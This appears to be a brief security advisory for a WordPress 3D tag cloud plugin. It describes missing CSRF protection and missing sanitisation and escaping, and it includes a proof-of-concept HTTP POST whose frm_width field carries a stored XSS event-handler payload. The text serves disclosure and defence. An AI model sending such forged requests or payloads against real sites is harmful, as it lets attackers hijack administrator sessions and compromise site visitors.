The plugin does not have Cross-Site Request Forgery (CSRF) check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored Cross-Site Scripting (XSS) payloads via a Cross-Site Request Forgery (CSRF) attack.
Proof of Concept
POST /wp-admin/options-general.php?page=wp_3d_tag_cloud_slug HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
frm_width=%22%20onmouseover%3Dalert(/XSS/)%20onload%3D%22&frm_submit=true